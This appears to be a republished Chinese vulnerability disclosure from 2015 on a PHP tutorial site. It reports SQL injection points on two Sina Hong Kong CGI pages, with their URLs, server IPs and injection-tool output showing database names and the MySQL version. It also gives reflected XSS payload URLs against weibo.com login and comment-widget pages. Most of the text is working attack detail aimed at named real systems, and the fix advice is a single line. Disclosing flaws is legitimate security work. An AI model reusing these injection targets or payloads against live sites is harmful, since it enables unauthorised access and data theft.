网站地图    收藏   

主页 > 后端 > 网站安全 >

新浪注入及微博xss各两枚 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 不过注入需要一点小条件...两个注入: 其中一个盲注,一个可以可以执行部分查询命令注入站点1:http://sme.sina.com.hk/cgi-bin/nw/main.cgi?cat=7806ip:218.213.85.141注入站点2:http://house.sina.com.hk/cgi...

不过注入需要一点小条件...
两个注入: 其中一个盲注,一个可以可以执行部分查询命令
 
注入站点1:
http://sme.sina.com.hk/cgi-bin/nw/main.cgi?cat=7806
ip:218.213.85.141


注入站点2:
http://house.sina.com.hk/cgi-bin/nw/main.cgi?id=7
ip:218.213.85.179


条件:
不知道是不是域名解析问题还是什么什么原因,有时候国内ip不能访问这些域名或者ip也不可以
不过如果代理出去就可以了继续注入了--!

域名1:
http://sme.sina.com.hk/cgi-bin/nw/main.cgi?cat=7806

Host IP: 218.213.85.141
Keyword Found: ?T?x????????C????
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 1
Valid String Column is 1
Current DB: sme


域名2:mysql盲注


Host IP: 218.213.85.179
Keyword Found: iPhone
Injection type is Integer
DB Server: MySQL >=4.1
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Testing for MySQL error based injection method
MySQL error based injection method cant be used!
Trying blind method
Finding current data base
Length of 'Current DB' is 5
Current DB: house

站点1可以select @@version->4.1.22-log


站点2:mysql盲注

 



作者 upload


xss:

1.

地址:
http://weibo.com/login.php?url=http://club.weibo.com&entry=daren"><script>alert(/By+FeiFei/)</script>




修复方案:
这个...你们处理很多了。。。

编码或转义用户提交参数。

http://weibo.com/callmefeifei 求粉。

地址一:
http://open.weibo.com/widget/comments.php


问题出在手动配置url处,过滤的不够严谨。


地址二:
http://widget.weibo.com/distribution/comments.php?language=zh_cn&appkey=1&url=http://feifei']);'</script><ScRipt>alert(/By+FeiFei/)</ScRipt>

 

看了下,这样也OK~~

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论